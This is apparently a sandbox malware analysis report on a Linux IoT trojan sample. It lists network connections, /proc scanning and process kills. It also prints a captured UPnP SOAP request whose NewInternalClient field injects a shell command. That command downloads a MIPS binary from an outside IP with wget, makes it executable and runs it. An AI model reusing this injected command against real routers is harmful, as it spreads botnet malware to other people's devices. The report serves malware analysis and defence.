Source: unknown	TCP traffic detected without corresponding DNS query: 197.192.232.101
Source: unknown	TCP traffic detected without corresponding DNS query: 41.240.8.60
Source: unknown	TCP traffic detected without corresponding DNS query: 197.48.195.180
Source: unknown	TCP traffic detected without corresponding DNS query: 156.128.146.240
Source: unknown	TCP traffic detected without corresponding DNS query: 197.112.103.101
Source: unknown	TCP traffic detected without corresponding DNS query: 156.118.63.44
Source: unknown	TCP traffic detected without corresponding DNS query: 156.138.35.236
Source: unknown	TCP traffic detected without corresponding DNS query: 197.97.134.4
Source: unknown	TCP traffic detected without corresponding DNS query: 41.9.128.78
Source: unknown	TCP traffic detected without corresponding DNS query: 156.32.150.224
Source: unknown	TCP traffic detected without corresponding DNS query: 41.44.230.177
Source: unknown	TCP traffic detected without corresponding DNS query: 156.168.32.235
Source: unknown	TCP traffic detected without corresponding DNS query: 41.154.152.117
Source: unknown	TCP traffic detected without corresponding DNS query: 197.178.36.204
Source: unknown	TCP traffic detected without corresponding DNS query: 41.232.207.168
Source: unknown	TCP traffic detected without corresponding DNS query: 41.100.2.147
Source: unknown	TCP traffic detected without corresponding DNS query: 197.4.52.171
Source: unknown	TCP traffic detected without corresponding DNS query: 41.230.207.46
Source: unknown	TCP traffic detected without corresponding DNS query: 197.100.246.239
Source: unknown	TCP traffic detected without corresponding DNS query: 197.95.12.197
Source: unknown	TCP traffic detected without corresponding DNS query: 156.61.187.249
Source: unknown	TCP traffic detected without corresponding DNS query: 41.124.202.64
Source: unknown	TCP traffic detected without corresponding DNS query: 41.185.115.36
Source: unknown	TCP traffic detected without corresponding DNS query: 156.142.51.247
Source: unknown	TCP traffic detected without corresponding DNS query: 156.213.9.226
Source: unknown	TCP traffic detected without corresponding DNS query: 156.212.251.211
Source: unknown	TCP traffic detected without corresponding DNS query: 197.93.26.85
Source: unknown	TCP traffic detected without corresponding DNS query: 41.160.106.24
Source: unknown	TCP traffic detected without corresponding DNS query: 41.201.82.220
Source: unknown	TCP traffic detected without corresponding DNS query: 156.138.216.195
Source: unknown	TCP traffic detected without corresponding DNS query: 41.219.229.244
Source: unknown	TCP traffic detected without corresponding DNS query: 156.2.4.90
Source: unknown	TCP traffic detected without corresponding DNS query: 197.100.115.254
Source: unknown	TCP traffic detected without corresponding DNS query: 156.222.253.242
Source: unknown	TCP traffic detected without corresponding DNS query: 41.87.217.31
Source: unknown	TCP traffic detected without corresponding DNS query: 41.141.187.222
Source: unknown	TCP traffic detected without corresponding DNS query: 197.103.236.208
Source: unknown	TCP traffic detected without corresponding DNS query: 41.132.232.168
Source: unknown	TCP traffic detected without corresponding DNS query: 197.201.161.248
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 41.43.102.26
Source: unknown	TCP traffic detected without corresponding DNS query: 156.34.81.123

Source: MePwVTNRoA, 5238.1.00000000308361d7.00000000bbcae9b7.r-x.sdmp	String found in binary or memory: http://37.0.9.202/bins/Hilix.mips
Source: MePwVTNRoA, 5238.1.00000000308361d7.00000000bbcae9b7.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: MePwVTNRoA, 5238.1.00000000308361d7.00000000bbcae9b7.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Source: unknown

HTTP traffic detected: POST /picdesc.xml HTTP/1.1Host: 127.0.0.1:52869Content-Length: 630Accept-Encoding: gzip, deflateSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMappingAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Connection: keep-aliveData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6e 69 67 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 33 37 2e 30 2e 39 2e 32 30 32 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 20 2d 4f 20 6e 69 67 3b 20 63 68 6d 6f 64 20 37 37 37 20 6e 69 67 3b 20 2e 2f 6e 69 67 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://37.0.9.202/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/MePwVTNRoA (PID: 5240)	SIGKILL sent: pid: 936, result: successful
Source: /tmp/MePwVTNRoA (PID: 5246)	SIGKILL sent: pid: 936, result: no such process

Source: classification engine

Classification label: mal72.troj.lin@0/2@0/0

Source: MePwVTNRoA

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/491/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/793/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/772/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/796/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/774/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/797/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/777/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/799/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/658/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/912/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/759/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/936/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/918/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/1/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/761/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/785/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/884/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/720/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/721/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/788/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/789/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/800/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/801/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/847/fd
Source: /tmp/MePwVTNRoA (PID: 5240)	File opened: /proc/904/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/491/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/793/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/772/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/796/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/774/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/797/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/777/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/799/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/658/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/912/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/759/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/936/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/918/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/1/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/761/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/785/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/884/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/720/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/721/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/788/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/789/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/800/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/801/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/847/fd
Source: /tmp/MePwVTNRoA (PID: 5246)	File opened: /proc/904/fd

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48818 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43624 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38902 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33320 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49054 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49056 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33960
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33964
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48992 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34102 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34102 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34102 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34102 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59522 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34102 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36310 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36310 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37578 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36310 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37588 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54488 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 54488
Source: unknown	Network traffic detected: HTTP traffic on port 54496 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42524 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 54496
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 42524
Source: unknown	Network traffic detected: HTTP traffic on port 42532 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 42532
Source: unknown	Network traffic detected: HTTP traffic on port 42360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36310 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34102 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56230 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56242 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45200 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36310 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59798 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35880 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34272 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39426
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39434
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39440
Source: unknown	Network traffic detected: HTTP traffic on port 42360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39444
Source: unknown	Network traffic detected: HTTP traffic on port 36212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39448
Source: unknown	Network traffic detected: HTTP traffic on port 38634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39456
Source: unknown	Network traffic detected: HTTP traffic on port 36986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39460
Source: unknown	Network traffic detected: HTTP traffic on port 56142 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39974 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39466
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36310 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39482
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39490
Source: unknown	Network traffic detected: HTTP traffic on port 40462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39974 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56142 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53686 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53692 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53686
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53692
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34102 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54806 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48050 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 48050
Source: unknown	Network traffic detected: HTTP traffic on port 34322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54806 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54806 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48074 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40338 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40342 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48074 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39974 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56142 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54806 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48074 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48074 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54806 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 57290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36310 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42686 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48074 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39974 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56142 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33660 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33674 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42686 -> 52869
